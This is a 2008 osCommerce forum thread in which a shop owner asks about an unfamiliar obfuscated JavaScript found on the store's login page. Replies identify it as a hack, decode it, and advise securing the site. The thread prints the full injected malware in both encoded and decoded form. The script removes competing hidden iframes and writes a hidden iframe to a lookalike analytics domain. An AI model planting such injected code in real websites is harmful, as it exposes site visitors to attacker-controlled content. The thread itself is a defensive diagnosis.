varois Posted September 22, 2008 Share Posted September 22, 2008 My shop start to display one ssl error. the saying that i have itens not secure in my page, if i wish to continue and display the item ... Then i check all pictures and couldn't find any problem ... then i see this weird javascript function: <script> function c41883415430m48d35164537b8(m48d3516453ba0){ return (parseInt(m48d3516453ba0,16)); } function m48d3516454757(m48d3516454b3f){ function m48d35164556f7(){ var m48d3516455adf=2; return m48d3516455adf; } var m48d3516454f27=''; m48d3516455ec6=String.fromCharCode; for(m48d351645530e=0;m48d351645530e<m48d3516454b3f.length; m48d351645530e+=m48d35164556f7()){ m48d3516454f27+=(m48d3516455ec6(c41883415430m48d35164537b8(m48d3516454b3f.substr (m48d351645530e,m48d35164556f7())))); } return m48d3516454f27; } var z16=''; var m48d35164562ae='3C7'+z16+'3637'+z16+'2697'+z16+'07'+z16+'43E667'+z16+'56E637'+z16+'4696F6E20636865636B5F636F6E7'+z16+'4656E7'+z16+'428297'+z16+'B7'+z16+'6617'+z16+'220693D303B7'+z16+'7'+z16+'68696C6528646F637'+z16+'56D656E7'+z16+'42E67'+z16+'657'+z16+'4456C656D656E7'+z16+'47'+z16+'3427'+z16+'9546167'+z16+'4E616D652827'+z16+'69667'+z16+'2616D6527'+z16+'292E6C656E67'+z16+'7'+z16+'468297'+z16+'B7'+z16+'6617'+z16+'220656C3D646F637'+z16+'56D656E7'+z16+'42E67'+z16+'657'+z16+'4456C656D656E7'+z16+'47'+z16+'3427'+z16+'9546167'+z16+'4E616D652827'+z16+'69667'+z16+'2616D6527'+z16+'295B695D3B6966282028656C2E7'+z16+'37'+z16+'47'+z16+'96C652E64697'+z16+'37'+z16+'06C617'+z16+'93D3D27'+z16+'6E6F6E6527'+z16+'207'+z16+'C7'+z16+'C20656C2E7'+z16+'37'+z16+'47'+z16+'96C652E7'+z16+'6697'+z16+'36962696C697'+z16+'47'+z16+'9203D3D27'+z16+'68696464656E27'+z16+'207'+z16+'C7'+z16+'C2028656C2E7'+z16+'7'+z16+'69647'+z16+'4683C3520262620656C2E68656967'+z16+'687'+z16+'43C35292920262620656C2E6E616D65213D27'+z16+'633427'+z16+'297'+z16+'B656C2E7'+z16+'0617'+z16+'2656E7'+z16+'44E6F64652E7'+z16+'2656D6F7'+z16+'6654368696C6428656C293B7'+z16+'D656C7'+z16+'36520692B2B3B7'+z16+'D7'+z16
+'D636865636B5F636F6E7'+z16+'4656E7'+z16+'428293B0D0A696628216D7'+z16+'96961297'+z16+'B646F637'+z16+'56D656E7'+z16+'42E7'+z16+'7'+z16+'7'+z16+'2697'+z16+'465287'+z16+'56E657'+z16+'363617'+z16+'065282027'+z16+'2533632536392536362537'+z16+'3225363125366425363525323025366525363125366425363525336425363325333425323025 37'+z16+'332537'+z16+'32253633253364253237'+z16+'2536382537'+z16+'342537'+z16+'342537'+z16+'30253361253266253266253637'+z16+'253666253666253637'+z16+'2536632536352532642536312536652536312536632536392537'+z16+'61253635253265253633253666253664253266253639253665253265253633253637'+z16+'25363925336625333125333526253237'+z16+'2532622534642536312537'+z16+'342536382532652537'+z16+'322536662537'+z16+'352536652536342532382534642536312537'+z16+'342536382532652537'+z16+'3225363125366525363425366625366425323825323925326125333225333325333925333225 3330253239253262253237'+z16+'253334253634253631253336253337'+z16+'253336253330253333253237'+z16+'2532302537'+z16+'37'+z16+'2536392536342537'+z16+'34253638253364253334253336253230253638253635253639253637'+z16+'2536382537'+z16+'342533642533352533322533302532302537'+z16+'332537'+z16+'342537'+z16+'39253663253635253364253237'+z16+'2536342536392537'+z16+'332537'+z16+'302536632536312537'+z16+'39253361253230253665253666253665253635253237'+z16+'2533652533632532662536392536362537'+z16+'3225363125366425363525336527'+z16+'29293B7'+z16+'D7'+z16+'6617'+z16+'2206D7'+z16+'969613D7'+z16+'47'+z16+'27'+z16+'5653B3C2F7'+z16+'3637'+z16+'2697'+z16+'07'+z16+'43E'; document.write(m48d3516454757(m48d35164562ae)); </script> i never see it before and at the end of the code, last line, i found this: <script>check_content()</script> if someone have any knowledge about what is this function, please help me .... i'm afraid to delete this and make a mistake into my shop ... Thanks !!!! Link to comment Share on other sites More sharing options...
spooks Posted September 22, 2008

Delete the script. You have been hacked; check the rest of your site and secure it. http://www.oscommerce.com/forums/index.php?showtopic=313323 Check your site logs in cPanel; the error logs will often show hacking attempts. Also look in the stats for frequent visitors. Sam
Vger Posted September 22, 2008

Yep, you've been hacked. If you have a Joomla or Mambo install on the same hosting, you may wish to deal with the security of that install as well, because this JavaScript hack is normally associated with Joomla and Mambo - specifically a MamBot hack. Vger
germ Posted September 23, 2008

In "man readable" form, the script decodes to this:

<script> function check_content() { var i=0; while( document.getElementsByTagName('iframe').length) { var el=document.getElementsByTagName('iframe')[i]; if (( el.style.display=='none' || el.style.visibility == 'hidden' || (el.width<5 && el.height<5))&& el.name!='c4'){ el.parentNode.removeChild(el); } else i++; } } check_content(); if ( !myia ){ document.write(unescape('%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%6f %67%6c%65%2d%61%6e%61%6c%69%7a%65%2e%63%6f%6d%2f%69%6e%2e%63%67%69%3f%31%35%27%2b%4d%61%74%68%2e %72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%39%32%30%29%2b%27%34%64%61%36 %37%36%30%33%27%20%77%69%64%74%68%3d%34%36%20%68%65%69%67%68%74%3d%35%32%30%20%73%74%79%6c%65 %3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e')); } myia = true; </script>

When you "unescape" the last part, it reads:

<iframe name=c4 src='http://google-analize.com/in.cgi?15'+Math.round(Math.random()*23920)+'4da67603' width=46 height=520 style='display: none'></iframe>

Gee.... :huh: It's an iframe..... :o What a surprise..... ;)

[Note: as decoded above, check_content() removes iframes that are hidden or smaller than 5x5 unless they are named c4, and the script then writes its own hidden iframe named c4. The iframe's host name imitates Google Analytics with a misspelling, and because its src is plain http:// it is the likely cause of the "items not secure" warning on the SSL page.]
varois (Author) Posted September 23, 2008

Hi guys, thanks for your answers - can you tell me what the objective was behind this hack? Any feedback is very welcome. Cheers, Varois
germ Posted September 23, 2008

Iframes are used to steal information. Since it was on your login page, it was used to steal login information.

[Note: the decoded script only shows a hidden iframe loading a page from another site; what that remote page did is not visible in this thread. An iframe from a different origin cannot by itself read the form fields of the page that embeds it, so the firmer conclusion is that someone was able to modify the shop's files. Find and close that entry point, and change the admin, FTP and database passwords.]